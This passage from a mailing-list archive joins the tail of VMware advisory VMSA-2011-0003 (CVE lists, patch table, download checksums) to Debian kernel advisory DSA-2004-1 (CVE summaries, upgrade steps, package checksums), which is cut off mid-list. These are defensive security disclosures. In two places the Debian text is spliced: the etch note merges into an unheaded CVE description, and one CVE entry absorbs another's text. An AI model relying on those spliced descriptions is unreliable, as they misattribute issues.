Player, ACE, Fusion. \n\n j. ESX third party update for Service Console kernel\n\n    The Service Console kernel is updated to include kernel version\n    2.6.18-194.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,\n    CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,\n    CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,\n    CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,\n    CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,\n    CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,\n    CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and\n    CVE-2010-3081 to the issues addressed in the update. \n\n    Note: This update also addresses the 64-bit compatibility mode\n    stack pointer underflow issue identified by CVE-2010-3081. This\n    issue was patched in an ESX 4.1 patch prior to the release of\n    ESX 4.1 Update 1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware vCenter Server 4.1 Update 1 and modules\n   ----------------------------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n   http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html\n\n   File type: .iso\n   md5sum: 729cf247aa5d33ceec431c86377eee1a\n   sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0\n\n   File type: .zip\n   md5sum: fd1441bef48a153f2807f6823790e2f0\n   sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi 4.1 Installable Update 1\n   -----------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1027919\n\n   File type: .iso\n   MD5SUM: d68d6c2e040a87cd04cd18c04c22c998\n   SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)\n   File type: .zip\n   MD5SUM: 2f1e009c046b20042fae3b7ca42a840f\n   SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)\n   File type: .zip\n   MD5SUM: 67b924618d196dafaf268a7691bd1a0f\n   SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516 \t\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)\n   File type: .zip\n   MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4\n   SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   MD5SUM: dad66fa8ece1dd121c302f45444daa70\n   SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e\n   SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi Installable Update 1 contains the following security bulletins:\n   ESXi410-201101201-SG. \n\n   ESX 4.1 Update 1\n   ----------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1029353\n\n   ESX 4.1 Update 1 (DVD ISO)\n   File type: .iso\n   md5sum: b9a275b419a20c7bedf31c0bf64f504e\n   sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)\n   File type: .zip\n   md5sum: 2d81a87e994aa2b329036f11d90b4c14\n   sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798 \t\n\n   Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1\n   File type: .zip\n   md5sum: 75f8cebfd55d8a81deb57c27def963c2\n   sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)\n   File type: .zip\n   md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2\n   sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   md5sum: dad66fa8ece1dd121c302f45444daa70\n   sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESX410-Update01 contains the following security bulletins:\n   ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,\n   Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904\n   ESX410-201101226-SG (glibc)      | http://kb.vmware.com/kb/1031330\n\n   ESX410-Update01 also contains the following non-security bulletins\n   ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,\n   ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,\n   ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,\n   ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,\n   ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,\n   ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG. \n\n   To install an individual bulletin use esxupdate with the -b option. \n\n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2011-02-10  VMSA-2011-0003\nInitial security advisory in conjunction with the release of vCenter\nServer 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1\nUpdate 1, and ESX 4.1 Update 1 on 2011-02-10. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2011 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9\ndxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX\n=2pVj\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2004-1                security@debian.org\nhttp://www.debian.org/security/                           Dann Frazier\nFebruary 27, 2010                   http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6.24\nVulnerability  : privilege escalation/denial of service/sensitive memory leak\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2009-2691 CVE-2009-2695 CVE-2009-3080 CVE-2009-3726\n                 CVE-2009-3889 CVE-2009-4005 CVE-2009-4020 CVE-2009-4021\n                 CVE-2009-4138 CVE-2009-4308 CVE-2009-4536 CVE-2009-4538\n                 CVE-2010-0003 CVE-2010-0007 CVE-2010-0291 CVE-2010-0410\n                 CVE-2010-0415 CVE-2010-0622\n\nNOTE: This kernel update marks the final planned kernel security\nupdate for the 2.6.24 kernel in the Debian release \u0027etch\u0027.  Although\nsecurity support for \u0027etch\u0027 officially ended on Feburary 15th, 2010,\nthis update was already in preparation before that date. Local users may be\n    able to read this data for setuid processes while the ELF binary\n    is being loaded. \n\nCVE-2009-2695\n\n    Eric Paris provided several fixes to increase the protection\n    provided by the mmap_min_addr tunable against NULL pointer\n    dereference vulnerabilities. \n\nCVE-2009-3080\n\n    Dave Jones reported an issue in the gdth SCSI driver. \n\nCVE-2009-3726\n\n    Trond Myklebust reported an issue where a malicious NFS server\n    could cause a denial of service condition on its clients by\n    returning incorrect attributes during an open call. \n\nCVE-2009-3889\n\n    Joe Malicki discovered an issue in the megaraid_sas driver. \n    Insufficient permissions on the sysfs dbg_lvl interface allow\n    local users to modify the debug logging behavior. \n\nCVE-2009-4005\n\n    Roel Kluin discovered an issue in the hfc_usb driver, an ISDN\n    driver for Colognechip HFC-S USB chip. A potential read overflow\n    exists which may allow remote users to cause a denial of service\n    condition (oops). \n\nCVE-2009-4020\n\n    Amerigo Wang discovered an issue in the HFS filesystem that would\n    allow a denial of service by a local user who has sufficient\n    privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem.  For this to be exploitable, the local user must\n    have sufficient privileges to mount a filesystem. \n\nCVE-2009-4536 \u0026 CVE-2009-4538\n\n    Fabian Yamaguchi reported issues in the e1000 and e1000e drivers\n    for Intel gigabit network adapters which allow remote users to\n    bypass packet filters using specially crafted Ethernet frames. \n    \nCVE-2010-0003\n\n    Andi Kleen reported a defect which allows local users to gain read\n    access to memory reachable by the kernel when the\n    print-fatal-signals option is enabled. This option is disabled by\n    default. \n\nCVE-2010-0007\n\n    Florian Westphal reported a lack of capability checking in the\n    ebtables netfilter subsystem. If the ebtables module is loaded,\n    local users can add and modify ebtables rules. \n\nCVE-2010-0410\n\n     Sebastian Krahmer discovered an issue in the netlink connector\n     subsystem that permits local users to allocate large amounts of\n     system memory resulting in a denial of service (out of memory). \n\nCVE-2010-0415\n\n    Ramon de Carvalho Valle discovered an issue in the sys_move_pages\n    interface, limited to amd64, ia64 and powerpc64 flavors in Debian. \n\nCVE-2010-0622\n\n    Jermome Marchand reported an issue in the futex subsystem that\n    allows a local user to force an invalid futex state which results\n    in a denial of service (oops). \n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.9etch3. \n\nWe recommend that you upgrade your linux-2.6.24 packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386,\nia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc\n    Size/MD5 checksum:     5118 e05bb21e7655cbfa39aed8d4fd6842eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz\n    Size/MD5 checksum:  4099250 127bad8d653046d37fc52115d4e3a332\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\n    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  4263554 6c56ff077d17eba766af47544ce0f414\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    83890 62cfd18ed176359831502e70d80b291a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1550090 1f114fdc3123f135017dbdcd0e4839c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1009878 c7b7abff092940a400703b9168e46daa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    98248 a2a391008f8855d8358d5f18d9d76044\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329786 a212d2b3a94f8a04611c0f20d3d324b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83428 f5f27b9de4905239e6315c77393f1f03\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83454 5d152b5b6aa505982ebc7122a770b29b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:  3455268 da2d2cc2b7c4253ac408c30fcfddb28f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329788 f589f8815f7adf02f8884e2dd3ac613f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329336 14bf085655b30adc8ab8f6ed4207d415\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:  3656476 f2f5de65037664d03208fcea83bf2ee2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83422 600c7216143f43f9c61b0c2ccd118ea0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83434 36f1d8f21ec39a473536dbeda2332e62\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:   346940 d3f12fdd61f90749fdd08d857b326327\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  9357734 3e1165a0795d7db5f7ed8ef84205064b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   298744 50d8bfa3c06134e190409399a36c5aa9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83546 1742ab93afadd1827009bf1d714e76eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83578 07906e33f9ad267d986991c93eef1048\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   308138 34dbc7720b1844833f0b71aa307c37fa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   310714 6a2c6fbbc1dd000b8a532227e3b8b5ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  3939512 91c2ba626e754fe407d6dcf3fa01337a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   259624 ac09dcabb624984b7321a5f6b6dbef54\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83578 e152e18748e5c80b6d06715db836cf83\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   260838 44bc8ad5796c124b53d85a8c3a4ed912\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   262420 ff0641f04c409dd606c34373e8e16269\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83546 990eb24056c7f6a63a4d55ec39563bae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:  3446386 6ebfa4544252648df48cfb085cc3d2cc\n  